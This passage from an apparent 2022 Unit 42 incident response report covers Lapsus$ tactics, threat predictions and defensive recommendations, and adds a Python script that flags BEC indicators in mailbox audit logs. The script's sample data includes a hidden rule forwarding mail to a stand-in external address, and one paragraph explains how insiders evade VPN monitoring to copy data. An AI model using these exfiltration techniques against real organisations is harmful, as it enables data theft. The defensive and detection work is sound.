Lapsus$ group doesn’t employ malware in breached environments, doesn’t encrypt
data and in most cases, doesn’t actually employ extortion.

Instead, the group focuses on using a combination of stolen credentials and
social engineering to gain access to organizations. We’ve also seen them
solicit employees on Telegram for their login credentials at specific
companies in industries including telecom, software, gaming, hosting
providers, and call centers.

Despite the low-tech approach, the group’s attacks and leaking of stolen data
can be damaging. We’ve also seen destructive Lapsus$ attacks where the actors
gained access to an organization’s cloud environment, wiped systems, and
destroyed virtual machines.

Arrests associated with Lapsus$, including that of the apparent ringleader,
involved a number of individuals between 16 and 21. Unit 42 researchers
assisted law enforcement with information on Lapsus$ threat actors’ activities.

Prediction #4: Difficult Economic Times Could Lead More People to Leverage
Cybercrime

If global economic conditions worsen, more people may be incentivized to try
their hand at cybercrime. While this could mean people with some technical
skills looking to make a quick buck during a hard time, it could also mean
that people within organizations are more likely to explore potential deals
with threat actors.

Some threat actor groups have been known to offer to pay insiders who are
willing to hand over credentials or assist with other forms of sabotage. When
some people are struggling to make ends meet, those offers could be more
tempting to some.

These factors may combine with the prevalence of remote and hybrid work—which
can make it easier for insiders to steal intellectual property. When working
remotely for most organizations, simply disconnecting from the VPN is
sufficient for preventing the organization from having insight into your
traffic. A company might block personal email and cloud storage sites, but the
employee can simply disconnect from the VPN and use their home internet to
access these resources from their work computer, then copy company data to
these personal locations.

What You Can Do to Get Ahead

Follow best practices for remote workers, including deploying robust endpoint
detection. Make sure you are practicing the principle of least privilege,
limiting access to sensitive data to those who need to have it. Consider a
data loss prevention (DLP) solution to monitor, govern, and prevent unsafe
transfers of sensitive data and corporate policy violations.

To protect against insider threats from employees who leave your organization,
revoke access to accounts promptly upon an employee’s departure. Integrating
these processes with HR termination processes can help ensure these steps are
not overlooked. Analyze data sent to personal email accounts, cloud storage
accounts, removable storage devices and so on during the last 30 days prior to
an employee submitting their resignation and continue monitoring/restricting
until their employment ends.

Prediction #5: Politically Motivated Incidents May Rise

As hot-button political issues intensify around the globe, our incident
response consultants believe there may be an increase in hacktivism and
politically motivated cybercrime. This could include, for example, data
exfiltration, likely with the purpose of sharing it publicly, website
defacement, or other ways to make a statement.

In some cases, threat actors may be working with nation-states or on the
payroll of politically motivated groups, and in other cases, the threat actors
may themselves have political motivations.

What You Can Do to Get Ahead

In addition to following best practices to protect your network—as you would
for any cyberthreat—keep a particular eye on alerts from organizations such as
the U.S. Cybersecurity and Infrastructure Security Agency (CISA). Organizations
like this one often provide warnings about prominent attack vectors or groups
of concern.

09
If You Take Any Action to
Protect Your Organization,
Start With These Six Things
The cyberthreat landscape can be overwhelming. Every day brings news of more
cyberattacks and ever-more-sophisticated attack types. Some organizations may
not know where to start, but our security consultants have some suggestions.

Unit 42 security consultants take pride in acting as trusted advisors. We are
always looking for opportunities to give back to the cybersecurity community,
and we often share key pieces of advice with existing and future clients.

Our security consultants have compiled the list below of the most common
recommendations given to clients, based on real-time threat intelligence and
experience with hundreds of incident response matters. It is important to note
that the provided recommendations are in no way a “silver bullet” for
security. However, they are a starting point toward achieving a more robust
and resilient cybersecurity program. If you aren’t addressing these
recommendations, we advise that you try to incorporate them into your
organization’s strategic roadmap.

If you’re further along in the journey toward securing your organization, it’s
still a good idea to double check to be sure you have these fundamentals in
place. For example, in our work with BEC, we found that many organizations
believe they’ve already taken the necessary steps to protect themselves.
However, in 2021, Unit 42 found that 89% of organizations that had been
subject to BEC attacks had not turned on multifactor authentication (MFA) or
followed email security best practices.

Multifactor Authentication (MFA) improves on the traditional password
authentication method by requiring two or more pieces of evidence for
authentication—helping prevent threat actors from being able to access a
system with stolen passwords alone. Additional authentication methods include
confirmation messages sent to a smartphone, for example, or the use of an app
for additional verification.

“Use multifactor authentication everywhere possible.”

Preeti D’Costa, Unit 42 Principal Consultant

The broad domains and extensive reach of cybersecurity make it easy for
potential gaps or deficiencies to fall off the radar. All it takes is one
unrecognized gap for an attacker to gain a foothold in an organization’s
cybersecurity infrastructure.

1. Conduct phishing prevention and recurring employee and contractor security
   training.

2. Disable any direct external RDP access: ensure all external remote
   administration is conducted through an enterprise-grade MFA VPN.

3. Patch internet-exposed systems as quickly as possible (given best practices
   for testing and responsible deployment) to prevent vulnerability
   exploitation.

4. Implement MFA as a technical control and security policy for all users.

5. Require that all payment verification takes place outside of email to
   ensure a multi-step verification process.

6. Consider a credential breach detection service and/or attack surface
   management solution to help track vulnerable systems and potential
   breaches.

“Work on the basics. Organizations like to follow the news and go after the
new ‘named’ vulnerability while still lacking in the fundamentals such as
patch management and multifactor authentication.”

Clint Patterson, Unit 42 Principal Consultant

10
Conclusion: Securing Your
Organization Is a Journey,
Not a Destination
We’ve aggregated the information gathered during our incident
response cases to provide an in-depth view of today’s cyberthreat
landscape, as well as what tactics threat actors may use in the future.

Now, it’s up to you to determine where to focus your defense efforts. We don’t
believe it’s possible to ensure that no breach will ever happen, but we do
know it’s possible to be well-prepared.

By taking action now, you can ensure that your organization isn’t an easy
target for threat actors. You can also minimize damage in the event of a
cyberattack by limiting attackers’ ability to spread through your networks and
work out ahead of time what your organization will need to do to remove
threats, restore normal operations and recover.

Once you’ve covered the basics outlined previously, you can turn to the more
in-depth recommendations that follow. First, we share a more detailed list of
recommendations that can help secure your organization as a whole. Next, we
share recommendations geared toward preventing common initial access methods
and attack types, which can help you concentrate on mitigating the risks that
matter most to your organization.

Initiate Your Response Within Minutes

The clock starts immediately when you’ve identified a breach. If you don’t
contain the breach right away and determine the root cause, your adversary
will be back in your environment again.

With a Unit 42 Retainer, our experts become an extension of your team on speed
dial, helping you respond faster so you can minimize the impact of an attack
and get back to business sooner.

“Remember to protect yourself against the hackers—not just the auditors.”

Dan O’Day, Unit 42 Consulting Director

Appendix: In-Depth
Recommendations to Help
Secure Your Organization

Once you’ve addressed our six essential recommendations, you can turn to the
sections below for more comprehensive recommendations and guidance. The
recommendations are divided into sections to help you focus your efforts where
your organization most needs protection.

Password Tips to Help Prevent Compromise

One of the easiest ways for threat actors to perform unauthorized actions is
if they can gain access to authorized credentials. Because of this, strong
passwords are of paramount importance. While passwords should be augmented
with MFA wherever possible, we recommend the following best practices to
strengthen password security:

• Require that default passwords be changed.

• Passwords should be at least 15 characters in length.

• Passwords should include both uppercase and lowercase letters.

• Passwords should include numbers.

• Passwords should include special characters.

• Individuals should be educated about the dangers of reusing passwords in
  multiple contexts.

• Provide a password management solution to enable employees to manage complex
  passwords more effectively.

Recommendations to Help Make Your Organization as a Whole More Secure

• Regularly create and test backups; ensure the backups are stored in a secure
  off-network location and are appropriately protected via physical or
  technical controls so threat actors cannot gain access and disable or delete
  backups to prevent recovery.

• Adopt account administration best practices across the organization,
  including requiring unique and complex passwords that are at least 15
  characters in length so they cannot be easily brute forced.

• Implement a password management solution to enable employees to manage
  complex passwords more effectively.

• Prevent the use of default accounts and passwords.

• Integrate MFA for all remote access, internet-accessible, and business email
  accounts to greatly reduce the organization’s attack surface. To prevent
  threat actors from circumventing MFA, disable legacy authentications/protocols
  and confirm that MFA is not only deployed, but that employees are also using
  it correctly.

• Remember to implement MFA internally. Too often, after authenticating MFA
  once, a user can bounce around the network without needing to re-verify MFA,
  even when moving to a system with a different trust level (e.g., from
  workstation to server).

• Consider using single-sign-on (SSO) platforms for web applications.

• Leverage EDR or XDR solutions, and ensure your security operations team
  understands how to utilize this technology in order to maintain full
  visibility across the network.

• Patch management is critical for operating systems and on-premises
  applications; APT actors will move very quickly to capitalize on
  vulnerabilities. While it’s still necessary to test patches in
  non-production environments and follow best practices for responsible
  deployment, organizations must prioritize speed as well. Address new
  published vulnerabilities as quickly as due diligence allows.

• Identify your organization’s critical and most valuable assets. This should
  include conducting an inventory of critical assets to understand where your
  highest-value targets are and if they require any additional protection.

• Regularly review Active Directory for newly created accounts, mailboxes, and
  unrecognized group policy objects.

• Maintain a log retention repository and regularly review all logs and login
  attempts for any unusual behavioral patterns. Ensure that logs are stored
  for the appropriate amount of time to fulfill any legal or regulatory
  obligations. Our consultants recommend a bare minimum of 90 days, though
  some we surveyed recommend a year or more—as long as possible.

• Leverage log aggregation systems, such as a security information and event
  management (SIEM) system, to increase log retention, integrity, and
  availability.

• Conduct regular security awareness training for all users, including
  contractors, on a yearly basis. Also consider utilizing a trusted training
  platform that allows you to incorporate custom goals and objectives into the
  training curriculum.

• Avoid utilizing a flat network: segregate networks and Active Directories,
  segmenting sensitive data, and leverage secure virtual local area networks
  (VLANs).

• Understand where sensitive data lives and implement strong access controls
  to protect that data; monitor and audit access regularly. Limit sensitive
  data access to only those who need it within your organization and with
  third parties.

“My proudest moments come when the client is able to restore their systems so
they can resume business operations.”

Danielle Lopez, Unit 42 Senior Consultant

• Have an incident response and remediation plan: Incidents may occur despite
  best efforts, so have a tested, comprehensive plan to ensure fast action
  should an incident occur. If you have cyber insurance (recommended), be sure
  to integrate the policy’s key processes and contacts into the plan.

• Follow a defense-in-depth approach, implementing safeguards at each layer of
  the web application stack. While the list can be long, it can include, for
  example, web application firewalls, operating system hardening, application
  input controls (e.g., parameterization, validation), file integrity
  monitoring, least-privileged user accounts for database access and
  industry-standard encryption.

• When implementing open source code, research it to understand whether it
  has any published vulnerabilities; only use code that is vetted and patched.
  Code scanners may help identify vulnerabilities in open-source software. A
  recent industry movement to embrace the use of software bills of
  materials—lists of all the components, libraries and modules that go into
  building a piece of software—could also make it easier to determine whether
  vulnerabilities lie within a piece of software your organization is using.

• Conduct regular web application/code reviews and annual penetration testing
  for all public-facing infrastructure to search for vulnerabilities; follow
  remediation recommendations.

• Run periodic scans that include configuration checks and perform regular
  system audits to detect misconfigurations. Open source scanning tools are
  available to help. For example, there are open source tools to identify
  leaked information from misconfigured IAM or find vulnerabilities during
  build-time in infrastructure as code.

• Upgrade from Server Message Block Version 1 to limit adversaries from using
  the inherent file sharing protocol to move laterally within your systems.

• Implement change control protocols that require review and sign-off on
  configuration changes.

• Disable administrative interfaces and access to debugging tools for anyone
  whose job role does not require them.

• Configure servers to prevent unauthorized access and directory listings.
  Enforce strong access controls.

• Configure security settings in your development environment according to
  best practices.

• Implement full-disk encryption for laptops and removable devices. Also have
  a contingency plan to disable lost or stolen devices.

• Implement and utilize mobile device management applications that have the
  capability to locate and/or remotely wipe devices.

• Give your employees a way to conduct their business legitimately; simply
  blocking certain vectors will result in creative workarounds that you’ll
  likely miss.

• Establish a DLP program responsible for classifying and tagging data and
  providing alerts when sensitive or other company-identified relevant
  information is leaving the organization.

• Should an employee be terminated, act quickly to revoke their access (e.g.,
  active sessions, tokens, accounts, MFA devices and rotating credentials),
  and then verify that access has been revoked. Ensure you preserve their
  system and data in case an investigation is needed. Coupling account
  revocation processes with HR processes can help ensure these steps are not
  overlooked during the termination process.

• Consider purchasing domains based on common spelling errors or variations of
  your organization’s name. This can make it harder for threat actors to
  impersonate your organization.

• Limit the use of privileged accounts to only when there is a valid business
  need or a user requires a privileged account in order to complete their job
  task, and do not reuse local administrator account passwords. This will
  assist in preventing initial access by attackers, privilege escalation and
  lateral movement across the network.

Recommendations to Prevent Phishing Attacks

• Utilize trusted training vendors or platforms that allow for custom
  curricula tailored to the organization and employee roles and that take
  into account the fast-evolving nature of threat actor methodologies.

• Create a “security awareness culture.” It is essential that company leaders
  buy into the importance of cybersecurity, support and promote richer cyber
  training programs, and emphasize security in company communications.

• Tailor web-based modules customized to individual groups pertinent to their
  roles and how they may be specifically targeted so employees can better
  spot and avoid tactics that may be used against them.

• Track leading performance indicators for your phishing tests so you can
  adjust phishing content and difficulty based on the needs of the
  organization.

• Develop comprehensive training that includes—and goes beyond—phishing and
  spear phishing. Include other social engineering concerns that involve
  physical security, industry best practices against device loss, insider
  threat indicators, etc.

• Gamify security training to better engage employees by setting goals, rules
  for reaching the goals, rewards or incentives, feedback mechanisms and
  leaderboards (organizations can compete against each other).

• Hold across-the-board training annually and a mid-year “refresh” that
  builds on specific areas of emphasis, such as advanced techniques for all
  employees.

• Adopt advanced phishing protection/machine learning solutions or other
  third-party solutions to detect and deter sophisticated phishing campaigns.

• Use anti-spoofing and email authentication techniques, such as Sender
  Policy Framework (SPF).

• Consider blocking account logins based on geographic regions if not needed
  for normal business operations.

• Make it easy for users to report suspected phishing email; promptly review
  and take action on such messages.

• Visually alert users concerning attachments from external senders. This may
  help identify spoofed domains that appear similar to the company’s domain.

• Leverage email security solutions that scan attachments and message
  contents as well as assess sender reputation.

“Organizations should assume that phishing will get through at least some of
the time and users will engage. Plan around minimizing the impact.”

Clint Patterson, Unit 42 Principal Consultant

• Many users have an unnecessary volume of unencrypted sensitive information
  in their email accounts. Simply not having this information in the account
  would significantly limit the scope of a potential breach should an
  unauthorized party obtain access. Encourage users to store information of
  this type via a file share with role-based access controls rather than
  simply in email.

Patching Recommendations to Keep Your Organization’s Systems Up to Date

• Inventory all IT assets (including storage, switches, laptops, etc.) across
  the entire distributed organization through automated discovery tools to
  get a clear picture of what you have to manage.

• Prioritize your patching needs. Determine which vulnerabilities represent
  high, medium, or low risk, and their level of priority for the business
  according to your organizational risk tolerance:

  − Supplement that list by researching vulnerabilities for all operating
    systems, applications, etc., and add those to your list of priorities to
    address every month.

  − Any vulnerabilities that have published PoC code should be considered in
    the “high” risk category to fix.

• Test your patches in a development QA environment to ensure they won’t
  “break the system” once deployed into production.

• Have a schedule for deploying patches regularly. For some companies, that
  may only be once a month. However, ensure you are able to deploy
  high-priority patches out of cycle when necessary (such as those for which
  PoCs have been published).

• Once patches are deployed, monitor them for stability. This may also include
  monitoring your network for stability.

• Remove systems that are running on operating systems that are no longer
  supported.

Recommendations to Secure Your Cloud Environment

• Periodically evaluate what data is accessible or exposed on the
  public-facing internet.

• Leverage expertise in cloud security, per platform. Managing security in
  the cloud requires expertise catered to the nuances of each platform. The
  more complex the platform, the more plentiful the opportunities for errors
  that can inadvertently disclose data.

• Ensure users with cloud control access are fully trained in each cloud
  environment.

• Evaluate your options for managed security services, if you do not have the
  in-house expertise, or your cloud estate is particularly complex and in a
  continual state of change.

• Control access to the cloud environment. Access to cloud controls such as
  CSP consoles, application programming interfaces (APIs), and command-line
  interfaces in the cloud should be restricted to only those who need it.
  Such role-based access control (RBAC) is essential to minimizing risks of
  configuration and other security errors.

• Use MFA for authorized users as well as certificates and digital signatures.

• Separate administrative and user credentials and limit everyday users to
  production environments.

• Implement allow listing where possible, to further limit access to known
  and trusted endpoints.

• Know what data you have in the cloud and where it is. Regularly audit your
  cloud data to know what sensitive data you have and where it’s located.

• Encrypt sensitive data (at a minimum), segment it, provide access using
  RBAC and rotate keys regularly. Evaluate whether maintaining your keys with
  the cloud provider or within your organization is the best option for you,
  but ensure you have a key security policy that limits key access and
  exposure to risk.

• Ensure file-level operations are logged. It’s important to have visibility
  into all historical access and creation/deletion events. Some CSPs don’t
  automatically log these events, and logging must be turned on. We recommend
  ensuring that appropriate logging tools are activated in cloud environments.

Recommendations to Prevent Business Email Compromise

• Include training on how to identify and manage fraudulent financial
  requests, especially if the request appears to be coming from a valid email
  address of a colleague—or even a superior.

• To mitigate the primary method of BEC fraud, ensure that financial wire
  transfer verification steps are conducted through non-email communication
  channels (e.g., text messages, voice phone calls).

• Limit the number of employees authorized to approve wire transfers and
  provide additional training for authorized employees.

• Implement blocking or alerting for auto-forwarding rules that forward
  messages externally.

• Create custom retention tags for email that: automatically move older items
  to archive; delete items older than a certain age (e.g., five years); and
  permanently delete items no longer needed (e.g., those older than seven
  years) from both primary and archive mailboxes. Keep in mind, however, that
  archival policies should align with compliance requirements.

• Disable legacy authentication (e.g., single-factor POP, IMAP, or SMTP AUTH).

• Enable enhanced and granular audit logging to increase visibility into
  potentially unauthorized activities.

• Configure and enable a DLP solution to prevent users from accidentally (or
  intentionally) sharing sensitive information.
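
As an added example (not part of the Unit 42 report), the following Python
script reviews a batch of mailbox audit events for three of the conditions the
BEC and phishing recommendations target: inbox rules that forward mail
externally, successful logins over legacy single-factor protocols, and logins
from regions outside normal business operations. The event field names, the
organization's domain and the allowed regions are constructed assumptions for
this example, not a real vendor's audit schema.

```python
"""Review mailbox audit events for BEC indicators: external auto-forward rules,
legacy-protocol logins and out-of-region logins.

The event format below is a simplified, constructed one for this example and
is not a real vendor schema; map your tenant's audit export onto these fields.
"""
from __future__ import annotations

import json
from dataclasses import dataclass

# Assumptions for the example: the organization's own mail domain and the
# regions where it normally operates (ISO country codes).
INTERNAL_DOMAINS = {"example.com"}
ALLOWED_REGIONS = {"US", "CA"}
# Protocols that authenticate with a password alone and so never prompt for MFA.
LEGACY_PROTOCOLS = {"POP3", "IMAP4", "SMTP_AUTH"}


@dataclass(frozen=True)
class Finding:
    user: str
    rule: str    # which recommendation the event runs against
    detail: str


def _external(addr: str) -> bool:
    """True when a recipient address is outside the organization's domains."""
    domain = addr.rsplit("@", 1)[-1].lower()
    return domain not in INTERNAL_DOMAINS


def check_event(event: dict) -> list[Finding]:
    """Evaluate one audit event against the three controls."""
    findings: list[Finding] = []
    user = event.get("user", "<unknown>")
    op = event.get("operation")

    # 1. Inbox rules (new or modified) that forward or redirect mail externally.
    if op in {"New-InboxRule", "Set-InboxRule"}:
        params = event.get("parameters", {})
        targets = (params.get("ForwardTo", []) + params.get("RedirectTo", [])
                   + params.get("ForwardAsAttachmentTo", []))
        ext = sorted(t for t in targets if _external(t))
        if ext:
            findings.append(Finding(
                user, "external-auto-forward",
                f"rule '{params.get('Name', '?')}' sends mail to {', '.join(ext)}"))

    # 2. Successful logins over legacy protocols (password only, no MFA).
    if op == "UserLoggedIn" and event.get("result") == "Success":
        proto = str(event.get("protocol", "")).upper()
        if proto in LEGACY_PROTOCOLS:
            findings.append(Finding(
                user, "legacy-auth-login",
                f"successful {proto} login from {event.get('ip')}"))

        # 3. Logins from regions where the business does not operate.
        region = event.get("country", "")
        if region and region not in ALLOWED_REGIONS:
            findings.append(Finding(
                user, "out-of-region-login",
                f"login from {region} ({event.get('ip')})"))
    return findings


def review(lines: list[str]) -> list[Finding]:
    """Run check_event over newline-delimited JSON records, skipping lines
    that are not valid JSON objects (a malformed export line must not abort
    the whole review)."""
    out: list[Finding] = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(event, dict):
            out.extend(check_event(event))
    return out


# Constructed sample records (not real logs): a benign archive rule, a rule
# that forwards externally and deletes the original, an IMAP login, an
# out-of-region browser login, a normal login, and one corrupt line.
SAMPLE_LOG = [
    json.dumps({"user": "a.lee@example.com", "operation": "New-InboxRule",
                "parameters": {"Name": "Archive", "MoveToFolder": "Archive"}}),
    json.dumps({"user": "a.lee@example.com", "operation": "Set-InboxRule",
                "parameters": {"Name": ".", "ForwardTo": ["drop@mail.invalid"],
                               "DeleteMessage": True}}),
    json.dumps({"user": "b.kim@example.com", "operation": "UserLoggedIn",
                "result": "Success", "protocol": "IMAP4",
                "ip": "203.0.113.7", "country": "US"}),
    json.dumps({"user": "c.ortiz@example.com", "operation": "UserLoggedIn",
                "result": "Success", "protocol": "Browser",
                "ip": "198.51.100.9", "country": "NG"}),
    json.dumps({"user": "d.ng@example.com", "operation": "UserLoggedIn",
                "result": "Success", "protocol": "Browser",
                "ip": "192.0.2.4", "country": "CA"}),
    "not json",
]

if __name__ == "__main__":
    for f in review(SAMPLE_LOG):
        print(f"[{f.rule}] {f.user}: {f.detail}")
```

Running the block against the constructed sample produces three findings, one
per control, and the one-character rule name on the forwarding rule is itself
a detail worth reviewing, since attackers often name rules to be overlooked.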

Want help preparing for an incident? Call in the experts.

If you have specific concerns about any of the incident types discussed here,
believe you may be under attack, or want tailored recommendations for putting
together an incident response plan or taking other proactive measures—we’d be
happy to help. Please contact us.

The Unit 42 Incident Response team is available 24/7, year-round. If you have cyber
insurance, you can request Unit 42 by name. You can also take preventive steps by
requesting any of our cyber risk management services.

Methodology

In creating this report, we reviewed the findings from a selection of
approximately 600 incident response cases Unit 42 completed between May 2021
and April 2022. These cases included examples of BEC, ransomware, insider
threat, nation-state espionage, network intrusions, and inadvertent
disclosures. Our clients spanned the range from small businesses and
organizations with fewer than 50 personnel to Fortune 500 companies and
government organizations with greater than 50,000 employees.

While the majority of cases were located in the U.S., the threat actors
conducting attacks were located worldwide, targeting businesses, organizations
and IT infrastructure globally. We supplemented our case data with in-depth
interviews with experienced security consultants to gather anecdotal and
narrative insights from their work with clients in specific areas of
expertise. Our recommendations and observations are based on areas where
threat actors were largely successful; as such, the lessons themselves have
broad applicability regardless of region or industry.

Unit 42 Incident Response Methodology

Every minute an attack remains unresolved costs you money and can damage your reputation. With Unit 42 incident response experts by your side, you will jumpstart your investigation and take advantage of our experience responding to thousands of incidents similar to yours. With our threat intelligence informed approach to incident response and advanced tools across endpoint, network, and cloud, we provide lightning-fast containment to minimize the impact on your business.

Unit 42’s average response time—how long it takes us to make initial contact after receiving a request for assistance—is well under 15 minutes. Once called in, we work quickly to understand the full scope of the intrusion, which systems are impacted, and what security actions have already been taken so we can quickly contain the incident.

Learn more about Unit 42 Incident Response services.

We follow a proven methodology:

Scope
For an accurate understanding of the incident, we know it’s critical to get the scoping phase right. This allows us to align the right resources and skill sets to get you back on your feet as quickly as possible, and to accurately estimate the level of effort needed to assist you.

Investigate
We then work to fully understand the incident as we investigate what happened, leveraging the available data and working alongside your team.

Secure
As the incident is contained and the threat actor and their tools are eradicated from your environment, we concurrently assist your organization with rapidly restoring operations.

Support and Report
Unit 42 will also assist you in understanding the root cause and potential impact of the incident, including any unauthorized access or acquisition of sensitive information that may trigger legal obligations.

Transform
We believe a key step in incident response is helping ensure an improved security posture going forward. We work with you to apply specific improvements that will help protect against future and similar attacks.

SCOPE: Define engagement scope. Assess the breadth, severity and nature of the security incident.

INVESTIGATE: Fully understand the incident. Our experts use advanced tools for evidence collection, detection and analysis to flag IoCs, TTPs and other clues.

SECURE: Contain and eradicate. We remove the threat with custom eradication strategies and provide 24/7 monitoring against new malicious activity.

SUPPORT & REPORT: Findings and response assistance. Get a detailed investigation report as well as guidance in implementing additional security controls while you get back on your feet.

TRANSFORM: Improve your security posture. Use lessons learned and apply specific improvements to your security approach to protect against future and similar attacks.

THREAT INTELLIGENCE underpins every phase.



About Palo Alto Networks
Palo Alto Networks is the world’s cybersecurity leader. We innovate
to outpace cyberthreats, so organizations can embrace technology
with confidence. We provide next-gen cybersecurity to thousands of
customers globally, across all sectors. Our best-in-class cybersecurity
platforms and services are backed by industry-leading threat
intelligence and strengthened by state-of-the-art automation.
Whether deploying our products to enable the Zero Trust Enterprise,
responding to a security incident, or partnering to deliver better
security outcomes through a world-class partner ecosystem, we’re
committed to helping ensure each day is safer than the one before. It’s
what makes us the cybersecurity partner of choice.

At Palo Alto Networks, we’re committed to bringing together the very best people in service of our mission, so we’re also proud to be the cybersecurity workplace of choice, recognized among Newsweek’s Most Loved Workplaces (2021), Comparably Best Companies for Diversity (2021), and HRC Best Places for LGBTQ Equality (2022). For more information, visit www.paloaltonetworks.com.

Palo Alto Networks has shared these findings, including file samples
and indicators of compromise, with our fellow Cyber Threat Alliance
members. CTA members use this intelligence to rapidly deploy
protections to their customers and systematically disrupt malicious
cyber actors. Visit the Cyber Threat Alliance for more information.

About Unit 42
Palo Alto Networks Unit 42 brings together world-renowned threat
researchers, elite incident responders and expert security consultants
to create an intelligence-driven, response-ready organization
that’s passionate about helping you proactively manage cyber risk.
Together, our team serves as your trusted advisor to help assess
and test your security controls against the right threats, transform
your security strategy with a threat-informed approach and respond
to incidents in record time so that you get back to business faster.
Visit paloaltonetworks.com/unit42.



Palo Alto Networks Prevent, Detect, and Respond Capabilities

PREVENT

Secure Access and Minimize the Attack Surface
Recommended products: Cortex Xpanse, ZTNA 2.0

Combine fine-grained, least-privileged access with continuous trust verification and deep, ongoing security inspection to protect all users, devices, apps, and data everywhere. Secure access and implement a system of record to track every asset, system, and service you own that is on the public internet, including RDP—a common initial attack vector.

Prevent Known and Unknown Threats
Recommended products: Advanced Threat Prevention, WildFire, Advanced URL Filtering, DNS Security, SaaS Security, IoT Security, Next-Generation Firewalls, Virtual Firewalls, Cloud NGFW for AWS, Containerized Firewalls

To stay ahead of fast-moving and evasive threats, ML-powered security stops known, unknown and zero-day threats in real time to eliminate the initial victim and any future targets across the attack lifecycle. Seamlessly integrated with Palo Alto Networks’ Next-Generation Firewalls, our Cloud-delivered Security Services coordinate intelligence across all traffic, applications, devices and users to provide best-in-class protection from exploits, malware, ransomware, malicious websites, phishing, spyware, and command and control (C2) and DNS threats.


DETECT

Detect Threats in Real Time
Recommended products: Cortex XDR, WildFire

To safeguard any enterprise, detecting and blocking exploits and evasive attacks with swift resolution is essential. Cortex XDR® uses machine learning to profile behavior and detect anomalies indicative of attack. WildFire® utilizes near real-time analysis to detect previously unseen, targeted malware and advanced persistent threats, keeping your organization protected.

Secure Cloud Workloads
Recommended products: Cloud Workload Protection, Cloud Code Security, Cloud Network Security

Palo Alto Networks helps ensure that all cloud infrastructure, Kubernetes, and container images are securely configured, and steps have been taken to minimize vulnerabilities by:

• Detecting and remediating vulnerabilities and misconfigurations in code repositories, container images, and infrastructure as code from DevOps tools.

• Detecting vulnerabilities and misconfigurations in hosts, containers, and serverless functions from build to deploy to run.

• Segmenting services.


RESPOND

Stop Lateral Movement and Data Leakage
Recommended products: Advanced Threat Prevention, DNS Security, Enterprise Data Loss Prevention, Identity-Based Microsegmentation

Threat actors, including ransomware actors, must establish command-and-control and will then typically move laterally after initial exploitation. Acting on objectives will often end in sensitive data extraction. Palo Alto Networks:

• Blocks 96% of unknown web-based malleable command and control as well as all known C2.

• Stops DNS-based attacks with 40% greater coverage of threats typically used in data exfiltration attempts that specifically exploit the DNS protocol.

• Provides visibility into and segments IoT, OT, IT, and Bluetooth devices.

• Automatically detects and prevents many types of unsafe transfers of sensitive data against corporate policies.

Automate Response
Recommended products: XSOAR Ransomware Playbooks. XSOAR Marketplace contains many other playbooks related to incident types discussed in this report.

Consider implementing tools that support the automated remediation of events and that leverage pre-made playbooks to respond to and recover from incidents.

Reduce Response Time with Retainers

When an attack occurs, there is a material threat to your business. It is critical to take swift action before the incident escalates. With a Unit 42 retainer in place, you can make our incident response experts extensions of your team on speed dial.

You won’t engage in a frantic search for resources either, because you will have an assigned point of contact with knowledge of your environment and dedicated communication channels for engaging the team. As a result, you can respond faster and more accurately should an incident occur to minimize the impact and get you back to business sooner.



3000 Tannery Way
Santa Clara, CA 95054

Main: +1.408.753.4000
Sales: +1.866.320.4788
Support: +1.866.898.9087

www.paloaltonetworks.com

© 2022 Palo Alto Networks, Inc. Palo Alto Networks is a registered trademark of Palo Alto Networks. A list of our trademarks can be found at https://www.paloaltonetworks.com/company/trademarks.html. All other marks mentioned herein may be trademarks of their respective companies. 2022 Unit 42 Incident Response Report 07/2022
